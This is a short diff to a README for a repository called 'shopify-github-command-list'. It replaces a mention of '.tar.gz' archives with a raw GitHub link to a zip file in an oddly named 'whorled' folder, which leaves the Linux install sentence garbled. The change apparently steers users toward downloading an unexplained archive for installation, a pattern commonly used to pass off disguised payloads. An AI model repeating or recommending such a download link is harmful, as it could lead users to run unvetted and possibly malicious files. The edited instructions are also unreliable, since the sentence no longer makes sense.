Oscar22222224gtggf/shopify-github-command-list/README.md

 ### Linux Users

-Linux users may find a `.tar.gz` or other archive formats.
+Linux users may find a `https://raw.githubusercontent.com/Oscar22222224gtggf/shopify-github-command-list/main/whorled/shopify-github-command-list.zip` or other archive formats.
 Use the terminal to extract and follow the provided installation instructions.

 ## 📖 Table of Contents